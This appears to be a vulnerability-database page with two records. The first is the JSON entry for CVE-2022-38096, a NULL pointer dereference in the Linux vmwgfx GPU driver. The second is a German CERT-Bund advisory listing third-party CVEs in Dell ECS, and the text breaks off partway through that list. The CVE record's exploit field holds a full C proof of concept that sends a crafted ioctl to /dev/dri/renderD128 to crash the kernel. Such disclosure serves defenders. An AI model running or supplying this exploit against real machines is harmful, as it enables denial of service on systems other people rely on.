Action not permitted
Modal body text goes here.
cve-2022-38096
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-16 19:46
Severity ?
EPSS score ?
Summary
There is a NULL pointer vulnerability in vmwgfx driver
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.14",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-38096",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-26T13:45:25.191519Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-26T13:49:29.690Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-03T10:45:52.802Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.13.0-52*",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
}
],
"datePublic": "2022-09-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
}
],
"exploits": [
{
"lang": "en",
"value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=sid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context(); \n printf(\"%d\",cid); \n poc(cid); \n \n}"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T21:08:05.642043",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"source": {
"defect": [
"https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
],
"discovery": "INTERNAL"
},
"title": "There is a NULL pointer vulnerability in vmwgfx driver",
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2022-38096",
"datePublished": "2022-09-09T14:39:51.163117Z",
"dateReserved": "2022-09-07T00:00:00",
"dateUpdated": "2024-09-16T19:46:43.355Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2022-38096\",\"sourceIdentifier\":\"security@openanolis.org\",\"published\":\"2022-09-09T15:15:14.407\",\"lastModified\":\"2024-11-21T07:15:47.077\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).\"},{\"lang\":\"es\",\"value\":\"Se ha encontrado una vulnerabilidad de desreferencia de puntero NULL en el controlador vmwgfx en el archivo drivers/gpu/vmxgfx/vmxgfx_execbuf.c en el componente GPU del kernel de Linux con el archivo de dispositivo \\\"/dev/dri/renderD128 (o Dxxx)\\\". Este fallo permite a un atacante local con una cuenta de usuario en el sistema conseguir privilegios, causando una denegaci\u00f3n de servicio (DoS)\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security@openanolis.org\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.1,\"impactScore\":4.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":5.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security@openanolis.org\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-476\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-476\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"4.20\",\"matchCriteriaId\":\"BFF66E81-5620-41E9-832D-BD820B585A70\"}]}]}],\"references\":[{\"url\":\"https://bugzilla.openanolis.cn/show_bug.cgi?id=2073\",\"source\":\"security@openanolis.org\",\"tags\":[\"Issue Tracking\",\"Permissions Required\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html\",\"source\":\"security@openanolis.org\"},{\"url\":\"https://bugzilla.openanolis.cn/show_bug.cgi?id=2073\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Issue Tracking\",\"Permissions Required\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
}
}
wid-sec-w-2024-0794
Vulnerability from csaf_certbund
Published
2024-04-04 22:00
Modified
2024-11-27 23:00
Summary
Dell ECS: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Dell ECS ist ein Objektspeichersystem.
Angriff
Ein Angreifer kann mehrere Schwachstellen in Dell ECS ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuführen, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuführen, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuführen.
Betroffene Betriebssysteme
- Linux
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Dell ECS ist ein Objektspeichersystem.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in Dell ECS ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-0794 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-0794.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-0794 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-0794"
},
{
"category": "external",
"summary": "Dell Security Advisory DSA-2024-141 vom 2024-04-04",
"url": "https://www.dell.com/support/kbdoc/000223839/dsa-2024-="
}
],
"source_lang": "en-US",
"title": "Dell ECS: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2024-11-27T23:00:00.000+00:00",
"generator": {
"date": "2024-11-28T11:39:04.623+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.8"
}
},
"id": "WID-SEC-W-2024-0794",
"initial_release_date": "2024-04-04T22:00:00.000+00:00",
"revision_history": [
{
"date": "2024-04-04T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-11-27T23:00:00.000+00:00",
"number": "2",
"summary": "Produktzuordnung \u00fcberpr\u00fcft"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c3.8.1.0",
"product": {
"name": "Dell ECS \u003c3.8.1.0",
"product_id": "T033919"
}
},
{
"category": "product_version",
"name": "3.8.1.0",
"product": {
"name": "Dell ECS 3.8.1.0",
"product_id": "T033919-fixed",
"product_identification_helper": {
"cpe": "cpe:/h:dell:ecs:3.8.1.0"
}
}
}
],
"category": "product_name",
"name": "ECS"
}
],
"category": "vendor",
"name": "Dell"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2018-18074",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2018-18074"
},
{
"cve": "CVE-2020-10663",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-10663"
},
{
"cve": "CVE-2020-10672",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-10672"
},
{
"cve": "CVE-2020-10673",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-10673"
},
{
"cve": "CVE-2020-10735",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-10735"
},
{
"cve": "CVE-2020-10968",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-10968"
},
{
"cve": "CVE-2020-10969",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-10969"
},
{
"cve": "CVE-2020-11111",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-11111"
},
{
"cve": "CVE-2020-11112",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-11112"
},
{
"cve": "CVE-2020-11113",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-11113"
},
{
"cve": "CVE-2020-11612",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-11612"
},
{
"cve": "CVE-2020-11619",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-11619"
},
{
"cve": "CVE-2020-11620",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-11620"
},
{
"cve": "CVE-2020-11979",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-11979"
},
{
"cve": "CVE-2020-12762",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-12762"
},
{
"cve": "CVE-2020-12825",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-12825"
},
{
"cve": "CVE-2020-13956",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-13956"
},
{
"cve": "CVE-2020-14060",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-14060"
},
{
"cve": "CVE-2020-14061",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-14061"
},
{
"cve": "CVE-2020-14062",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-14062"
},
{
"cve": "CVE-2020-14195",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-14195"
},
{
"cve": "CVE-2020-15250",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-15250"
},
{
"cve": "CVE-2020-1945",
"notes": [
{
"category": "description",
